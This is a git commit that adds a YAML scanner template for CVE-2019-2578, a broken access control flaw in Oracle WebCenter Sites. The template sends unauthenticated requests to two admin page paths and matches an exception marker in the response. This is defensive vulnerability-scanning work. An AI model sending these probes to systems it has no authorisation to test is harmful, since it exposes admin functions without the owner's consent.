create check for cve-2019-2578

2021-11-06 01:24:41 +01:00 · 2021-11-06 01:24:41 +01:00 · 41464ac737
parent bbbd7909ee
commit 41464ac737
1 changed files with 32 additions and 0 deletions
--- a/cves/2019/CVE-2019-2578.yaml
+++ b/cves/2019/CVE-2019-2578.yaml
@ -0,0 +1,32 @@
+id: CVE-2019-2578
+
+info:
+  name: Broken Access Control Oracle WebCenter Sites
+  author: leovalcante
+  severity: high
+  description: Check cve-2019-2578 for Oracle WebCenter Sites.
+  reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
+  tags: oracle,webcenter sites,wcs,broken access control
+
+
+requests:
+  - raw:
+      - |
+        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
+        Host: {{BaseURL}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+      - |
+        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
+        Host: {{BaseURL}}
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+    redirects: false
+    matchers:
+      - type: regex
+        regex:
+          - '<script[\d\D]*<throwexception/>'
+        part: body
+    stop-at-first-match: true